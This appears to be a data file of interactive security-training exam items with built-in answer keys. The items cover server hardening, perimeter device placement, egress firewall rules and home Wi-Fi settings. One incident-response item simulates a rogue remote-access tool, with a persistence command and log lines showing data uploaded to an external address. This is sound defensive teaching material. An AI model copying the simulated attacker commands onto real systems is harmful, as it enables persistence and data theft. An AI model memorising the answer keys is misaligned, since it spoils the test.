   {id:"admin",g:"acct",l:"Built-in Administrator (renamed, strong password)",t:"toggle",on:"Enabled",off:"Disabled",start:true,why:"Nothing in the baseline asked you to touch it, and the MSP may rely on it for break-glass access."},
   {id:"wu",g:"base",l:"Windows Update",t:"select",o:["Automatic (MSP patch policy)","Notify only","Disabled"],start:"Notify only",want:"Automatic (MSP patch policy)"},
   {id:"siem",g:"base",l:"Forward security log to MSP SIEM",t:"toggle",start:false,want:true},
   {id:"fde",g:"base",l:"BitLocker",t:"toggle",start:false,why:"Not in this ticket."}
  ],
  why:"Harden a server by role: keep SMBv3 and the management agent, remove SMBv1/FTP/LLMNR/NetBIOS, scope RDP to the management network, fix the share ACLs, log to the SIEM, patch automatically. Do not break the client's access or the MSP's."},
 {id:"pc2",obj:"3.2",d:3,cat:"netsec",type:"diagram",title:"City government: place the perimeter services",
  prompt:"Place the devices that handle the city's inbound, outbound and remote traffic.",
  task:["Slot A sits inline between the firewall and the core switch and must block known exploits in real time.","Slot B is where employees' encrypted remote-access tunnels terminate.","Slot C is the single egress point for staff web browsing, applying URL filtering and logging.","Slot D scans inbound email for spam, malware and spoofing before it reaches the mail server."],
  nodes:[{id:"inet",label:"Internet",x:52,y:150,k:"cloud"},{id:"fw",label:"Firewall",x:140,y:150,k:"box",w:66},{id:"core",label:"Core switch",x:316,y:150,k:"sw"},{id:"staff",label:"Staff LAN",x:430,y:100,k:"pc",w:76},{id:"mail",label:"mail01",x:430,y:200,k:"srv",w:70}],
  links:[["inet","fw"],["fw","A"],["A","core"],["core","staff"],["fw","B"],["B","core"],["core","C"],["C","fw"],["fw","D"],["D","mail"]],
  slots:[{id:"A",label:"A · inline",x:228,y:150,want:"ips",why:"Inline and blocking = IPS."},
         {id:"B",label:"B · tunnels end",x:228,y:52,want:"vpn"},
         {id:"C",label:"C · browsing egress",x:228,y:248,want:["proxy","webfilter"],why:"A forward proxy / web filter is the one chokepoint for outbound web traffic."},
         {id:"D",label:"D · inbound mail",x:330,y:250,want:"mailgw",why:"An email security gateway applies spam, malware and SPF/DKIM/DMARC checks before delivery."}],
  palette:["ips","vpn","proxy","mailgw","ids","waf","lb","jump"],
  why:"Inline IPS behind the firewall, VPN concentrator for remote access, forward proxy for egress, email gateway in front of the mail server. The IDS, WAF, load balancer and jump box have no job described here."},
 {id:"pc3",obj:"4.5",d:4,cat:"netsec",type:"fweditor",title:"MSP: egress filtering for a client office",
  prompt:"An MSP client's firewall sits between its workstation VLAN, its server VLAN and the internet. The inherited table lets almost anything out. Edit, add, delete and reorder rules until it enforces the MSP's egress standard. Rules are evaluated top-down.",
  tasks:["The threat-intel range 203.0.113.0/24 is blocked for every source, web traffic included.","Workstations (10.60.20.0/24) may browse the internet on TCP 80 and TCP 443.","Workstations resolve names only through the internal DNS server (10.60.10.53, UDP 53); only that server may send DNS to the internet.","Only the mail server (10.60.10.25) may send SMTP (TCP 25) to the internet.","The MSP management VPN (10.99.0.0/24) may reach the client server VLAN (10.60.10.0/24) on TCP 3389 only. Everything else is denied."],
  nets:[{v:"any",l:"Any"},{v:"10.60.20.0/24",l:"Workstations"},{v:"10.60.10.0/24",l:"Server VLAN"},{v:"10.60.10.53",l:"Internal DNS server"},{v:"10.60.10.25",l:"Mail server"},{v:"10.99.0.0/24",l:"MSP management VPN"},{v:"203.0.113.0/24",l:"Threat-intel range"}],
  ports:["any","25","53","80","443","3389"],
  maxRules:9,
  rules:[
   {act:"allow",src:"10.60.20.0/24",dst:"any",port:"any",proto:"any"},
   {act:"deny",src:"any",dst:"203.0.113.0/24",port:"any",proto:"any"},
   {act:"allow",src:"10.60.10.25",dst:"any",port:"25",proto:"tcp"},
   {act:"allow",src:"10.99.0.0/24",dst:"10.60.10.0/24",port:"any",proto:"any"},
  ],
  packets:[
   {src:"10.60.20.41",dst:"198.51.100.80",port:443,proto:"tcp",want:"allow",note:"workstation web browsing over HTTPS"},
   {src:"10.60.20.41",dst:"198.51.100.80",port:80,proto:"tcp",want:"allow",note:"workstation web browsing over HTTP"},
   {src:"10.60.20.41",dst:"203.0.113.15",port:443,proto:"tcp",want:"deny",note:"the threat-intel deny must sit ABOVE the workstation web allow"},
   {src:"10.60.20.41",dst:"198.51.100.53",port:53,proto:"udp",want:"deny",note:"workstations may not query outside resolvers directly (DNS tunneling path)"},
   {src:"10.60.20.41",dst:"10.60.10.53",port:53,proto:"udp",want:"allow",note:"workstations use the internal resolver"},
   {src:"10.60.10.53",dst:"198.51.100.53",port:53,proto:"udp",want:"allow",note:"the internal resolver forwards to the internet"},
   {src:"10.60.20.41",dst:"198.51.100.25",port:25,proto:"tcp",want:"deny",note:"a workstation sending SMTP directly is a spam bot"},
   {src:"10.60.10.25",dst:"198.51.100.25",port:25,proto:"tcp",want:"allow",note:"the mail server delivers outbound mail"},
   {src:"10.60.10.25",dst:"203.0.113.30",port:25,proto:"tcp",want:"deny",note:"the threat-intel block applies to every source, the mail server included"},
   {src:"10.99.0.14",dst:"10.60.10.25",port:3389,proto:"tcp",want:"allow",note:"MSP engineer RDP to a client server"},
   {src:"10.99.0.14",dst:"10.60.10.25",port:445,proto:"tcp",want:"deny",note:"the management VPN gets RDP only, not any/any"},
   {src:"10.60.20.41",dst:"10.60.10.25",port:3389,proto:"tcp",want:"deny",note:"workstations have no RDP path to the servers"},
  ],
  why:"Egress filtering: DNS and mail leave through the one server built for each, so a bot on a workstation cannot tunnel over DNS or spam over port 25, and threat-intel denies go above the web allows they must override. The MSP's management access is scoped to the one protocol it needs instead of any/any."},
 {id:"pc4",obj:"4.8",d:4,cat:"ir",type:"console",title:"Incident console: rogue remote-access tool at city hall",
  prompt:"The MSP's SOC sees a city permits server and a clerk's workstation holding sessions to addresses on its threat feed. You have a shell on both through the MSP's tooling. Contain it; the permits portal, printing and the MSP's own RMM agent must keep working.",
  tasks:["The attacker installed a remote-access tool that imitates the MSP's RMM agent. Tell them apart by binary path, listening port and remote address.","Stop each rogue service AND disable it so it does not return at boot.","Block every IoC address on every host that connects to it.","nginx, PostgreSQL and SSH on permits01, the print spooler on CLERK-WS12, and the genuine MSP RMM agent on both hosts (it reports to the MSP management network, 10.99.0.0/24) must keep running."],
  iocs:{ports:[4899],procs:[],ips:["198.51.100.140","203.0.113.45"]},
  requireDisable:true,
  hosts:[
   {id:"permits01",os:"linux",name:"permits01",ip:"10.60.10.12",user:"mspadmin",
    services:[
     {name:"nginx",display:"A high performance web server",proc:"nginx",pid:1210,port:443,proto:"tcp",user:"www-data",cmd:"nginx: master process /usr/sbin/nginx",keep:true},
     {name:"postgresql",display:"PostgreSQL RDBMS",proc:"postgres",pid:960,port:5432,proto:"tcp",bind:"127.0.0.1",user:"postgres",cmd:"/usr/lib/postgresql/15/bin/postgres -D /var/lib/postgresql/15/main",keep:true},
     {name:"ssh",display:"OpenBSD Secure Shell server",proc:"sshd",pid:801,port:22,proto:"tcp",user:"root",cmd:"sshd: /usr/sbin/sshd -D",keep:true},
     {name:"rmm-agent",display:"MSP RMM agent",proc:"rmm-agent",pid:1333,user:"root",cmd:"/opt/msp/rmm/rmm-agent --server 10.99.0.20:443",remote:"10.99.0.20:443",keep:true},
     {name:"snmpd",display:"SNMP agent",proc:"snmpd",pid:1020,port:161,proto:"udp",user:"snmp",cmd:"/usr/sbin/snmpd -f"},
     {name:"rmm-helper",display:"MSP RMM helper",proc:"rmmhelper",pid:4470,port:4899,proto:"tcp",bind:"0.0.0.0",user:"root",cmd:"/usr/local/lib/.rmm/rmmhelper --listen 4899 --relay 198.51.100.140:8080",remote:"198.51.100.140:8080",bad:true},
    ],
    conns:[{proto:"tcp",local:"10.60.10.12:51882",remote:"203.0.113.45:443",state:"ESTABLISHED",pid:4470}],
    ufw:[["22/tcp","ALLOW IN","10.99.0.0/24"],["443/tcp","ALLOW IN","Anywhere"],["4899/tcp","ALLOW IN","Anywhere"]],
    files:{
     "/var/log/auth.log":"Oct  1 22:47:09 permits01 sshd[8811]: Accepted password for mspadmin from 198.51.100.140 port 52210 ssh2\nOct  1 22:48:30 permits01 sudo: mspadmin : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/install -m 755 rmmhelper /usr/local/lib/.rmm/\nOct  1 22:48:41 permits01 systemd[1]: Started MSP RMM helper.",
     "/var/log/syslog":"Oct  1 22:48:41 permits01 systemd[1]: Started MSP RMM helper.\nOct  1 22:48:42 permits01 rmmhelper[4470]: relay 198.51.100.140:8080 up, listening 0.0.0.0:4899\nOct  2 01:05:13 permits01 rmmhelper[4470]: upload /var/lib/permits/exports/permits_2026.csv -> 203.0.113.45:443\nOct  2 06:00:00 permits01 rmm-agent[1333]: check-in to 10.99.0.20:443 ok",
    }},
   {id:"clerk-ws12",os:"windows",name:"CLERK-WS12",ip:"10.60.20.112",user:"a.brennan",domain:"CITYHALL",
    services:[
     {name:"Spooler",display:"Print Spooler",proc:"spoolsv.exe",pid:1850,keep:true,mem:11300},
     {name:"RMMAgent",display:"MSP RMM Agent",proc:"rmmagent.exe",pid:2240,cmd:"C:\\Program Files\\MSP\\RMM\\rmmagent.exe --server 10.99.0.20:443",remote:"10.99.0.20:443",keep:true,mem:26400},
     {name:"W32Time",display:"Windows Time",proc:"svchost.exe",pid:1380,mem:4200},
     {name:"RMMAgentSvc",display:"MSP RMM Agent Service",proc:"rmmagentsvc.exe",pid:5520,port:4899,proto:"tcp",cmd:"C:\\ProgramData\\RMM\\rmmagentsvc.exe -listen 4899 -relay 198.51.100.140:8080",remote:"198.51.100.140:8080",mem:31800,bad:true},
    ],
    files:{
     "C:\\ProgramData\\RMM\\setup.log":"10/01/2026 23:02:10 copied rmmagentsvc.exe from \\\\10.60.10.12\\tmp$\n10/01/2026 23:02:11 sc create RMMAgentSvc binPath= \"C:\\ProgramData\\RMM\\rmmagentsvc.exe -listen 4899 -relay 198.51.100.140:8080\" start= auto DisplayName= \"MSP RMM Agent Service\"\n10/01/2026 23:02:13 relay 198.51.100.140:8080 connected",
    }},
  ],
  why:"Attackers often install a second remote-access tool that imitates the one the MSP already runs, so the name cannot settle it. The genuine agent runs from its install directory and reports to the MSP management network (10.99.0.20); the rogue one runs from a hidden or ProgramData path, listens on 4899 and relays to 198.51.100.140. Stopping the genuine agent cuts off the MSP's own response capability. Block both IoC addresses on the hosts that talk to them, including the exfiltration session on permits01."},
 {id:"pc5",obj:"4.1",d:4,cat:"harden",type:"appanel",title:"Remote firm: home-office AP standard",
  prompt:"Configure a remote employee's access point to the company standard. Change only what the standard lists.",device:"AP-HOME (employee-owned)",deviceSub:"Home wireless profile",
  task:["Rename the network to Remote-Office.","Use the strongest Personal (passphrase) mode and set a passphrase of at least 16 characters.","Management-frame protection must be required; the push-button setup feature must be off.","Replace the factory admin password and make sure the admin page cannot be opened from the wireless side."],
  start:{ssid:"NETGEAR37",hidden:false,band:"2.4 + 5 GHz",mode:"WPA2-Personal",psk:"happyriver123",eap:"PEAP (MSCHAPv2)",radiusHost:"",radiusPort:"1812",radiusSecret:"",pmf:"Disabled",wps:true,macFilter:"Off",isolation:false,mgmtWifi:true,adminDefault:"Factory default"},
  want:{ssid:"Remote-Office",mode:"WPA3-Personal",psk:{re:"^.{16,}$",label:"any passphrase of 16 or more characters"},pmf:"Required",wps:false,adminDefault:"Changed to a unique strong password",mgmtWifi:false},
  fieldWhy:{mode:"WPA3-Personal uses SAE (a Dragonfly key exchange) so an offline dictionary attack on a captured handshake no longer works.",psk:"Length beats complexity; 16+ characters defeats brute force even where WPA2 fallback exists."},
  why:"Home-office baseline: WPA3-Personal, long passphrase, PMF required, WPS off, factory admin password gone, management off the wireless side. The band and SSID visibility were not part of the standard."}
]
};
